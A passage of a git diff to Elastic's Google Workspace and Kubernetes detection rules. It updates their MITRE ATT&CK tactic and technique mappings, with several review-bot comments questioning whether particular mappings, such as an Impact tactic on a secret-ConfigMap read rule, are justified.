@@ -111,14 +111,26 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml index 040e19fdd98..57d821e3325 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,14 +106,26 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml index cb0bc8fec70..5d52d7026ce 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/06" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,19 +106,36 @@ event.dataset:"google_workspace.admin" and event.type:change and event.category: [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml index 8bc3d051239..b86f191f01d 100644 
--- a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml +++ b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,14 +100,26 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml index 0a6f1a1293f..5bfd274a247 100644 --- a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml +++ b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -111,31 +111,54 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml index 7e2e716541f..2afce3c35ea 100644 --- a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml +++ b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
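Review bot: The new Impact block maps T1565.001 Stored Data Manipulation onto a rule whose file name (`credential_access_azure_arc_proxy_secret_configmap_access.toml`) and existing Credential Access / Collection mappings describe reading a secret-bearing ConfigMap, not changing it; the ES|QL query is truncated in the hunk header (`FROM logs-kubernetes.audit_logs-* …`), so whether it also matches `update`/`patch`/`delete` verbs cannot be checked here. If the query only covers read verbs, the Impact mapping overstates what the rule detects and should be dropped; if it does cover writes, a sentence in the rule `note` saying so would justify the third tactic. The T1213 addition alongside T1530 under Collection reads fine.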
@@ -98,6 +98,41 @@ id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_anonymous_user.toml b/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_anonymous_user.toml index a8929be63ef..78095ce33eb 100644 --- a/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_anonymous_user.toml +++ b/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_anonymous_user.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -137,3 +137,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml index 359940c58b7..8d281cecbaf 100644 --- a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml +++ b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml @@ -2,7 +2,7 @@ creation_date = "2022/06/30" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,6 +91,16 @@ kubernetes.audit.objectRef.resource:("selfsubjectaccessreviews" or "selfsubjectr [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.003" +name = "Cloud Groups" +reference = "https://attack.mitre.org/techniques/T1069/003/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -100,7 +110,6 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] 
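Review bot: Reconnaissance (TA0043) with T1595.003 Wordlist Scanning is a pre-compromise tactic, and this rule already carries Discovery (TA0007, visible in the hunk's leading context); for an anonymous principal probing API-server endpoints the Reconnaissance mapping is defensible only if the rule is meant to fire on unauthenticated external probing rather than post-access enumeration. Worth confirming that the rule's `tags` (not touched in this file's diff) include `Tactic: Reconnaissance`, since TA0043 is rare in this rule set and is the kind of tag a tag/tactic consistency check flags first. A one-line `note` explaining why both tactics apply would help the next reviewer.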
diff --git a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml index 25df5e78816..0a7e58df7b7 100644 --- a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml +++ b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -40,6 +40,11 @@ kubernetes.audit.objectRef.resource == "pods" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml index 19a1619b8ab..46cf1eb9e04 100644 --- a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml +++ b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,3 +78,19 @@ framework = "MITRE ATT&CK" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
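Review bot: The two new `[[rule.threat]]` blocks in `execution_forbidden_creation_request.toml` carry a `[rule.threat.tactic]` (TA0003, TA0004) but no `[[rule.threat.technique]]`, unlike every other block added in this series. A tactic without a technique gives ATT&CK coverage reports nothing to count and is hard to justify later; if the forbidden creations this rule targets motivated those tactics, the technique behind each should be listed, otherwise the tactic-only block is better left out. The T1610 Deploy Container addition in `execution_anonymous_create_update_patch_pod_request.toml` on the same line reads fine.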
diff --git a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml index b6fa7170cb4..3ee8f23c9b9 100644 --- a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml +++ b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,6 +79,18 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml index 1dcd69850d3..da9b80ada3d 100644 --- a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml +++ b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -84,6 +84,31 @@ id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["kubernetes.audit.annotations.authorization_k8s_io/decision", "kubernetes.audit.user.username", "user_agent.original"]
diff --git a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml
index a850dfd2023..792d42d750c 100644
--- a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml
+++ b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/09/13"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/03/03"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -103,6 +103,18 @@ id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["user_agent.original"]
diff --git a/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml b/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml
index ac83b601e4d..fb3b3e9c302 100644
--- a/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml
+++ b/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/04"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -86,21 +86,3 @@ reference = "https://attack.mitre.org/techniques/T1098/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.006"
-name = "Additional Container Cluster Roles"
-reference = "https://attack.mitre.org/techniques/T1098/006/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml
index 229f671329b..f19fb4cd1e0 100644
--- a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml
+++ b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/05"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2025/06/18"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -91,14 +91,26 @@ event.dataset : "kubernetes.audit_logs"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1133"
 name = "External Remote Services"
 reference = "https://attack.mitre.org/techniques/T1133/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 
diff --git a/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml b/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml
index 0bb148e3260..f9329ea135b 100644
--- a/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml
+++ b/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/04"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/03/03"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -106,21 +106,3 @@ reference = "https://attack.mitre.org/techniques/T1098/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.006"
-name = "Additional Container Cluster Roles"
-reference = "https://attack.mitre.org/techniques/T1098/006/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml b/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml
index 746ad89fe61..a433254e859 100644
--- a/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml
+++ b/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/04"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -84,21 +84,3 @@ reference = "https://attack.mitre.org/techniques/T1098/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.006"
-name = "Additional Container Cluster Roles"
-reference = "https://attack.mitre.org/techniques/T1098/006/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml
index ec7881b3507..3a035b3ef2e 100644
--- a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/09/20"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -106,3 +106,16 @@ reference = "https://attack.mitre.org/techniques/T1610/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
index 15f42caaf18..00cfc028b8d 100644
--- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/05"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1610/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
index f68d1d287ff..00b34f2cfe3 100644
--- a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/05"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -120,3 +120,16 @@ reference = "https://attack.mitre.org/techniques/T1610/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
index 550d4cdd47e..44a7da15684 100644
--- a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/04"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -114,3 +114,16 @@ reference = "https://attack.mitre.org/techniques/T1098/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml
index cd55cbf8734..5db31548fc8 100644
--- a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/05"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/03/05"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -107,6 +107,18 @@ id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["user_agent.original", "source.ip", "kubernetes.audit.user.username"]
diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml
index 0314f867e2f..dd96a8d835c 100644
--- a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/04"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -110,3 +110,16 @@ reference = "https://attack.mitre.org/techniques/T1098/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml
index 6c59087b0b3..fe4db96ec06 100644
--- a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml
+++ b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/09/13"
 integration = ["kubernetes"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -107,3 +107,16 @@ reference = "https://attack.mitre.org/techniques/T1078/001/"
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1610"
+name = "Deploy Container"
+reference = "https://attack.mitre.org/techniques/T1610/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml
index a2e6b2e13ee..d7e8c4ec45a 100644
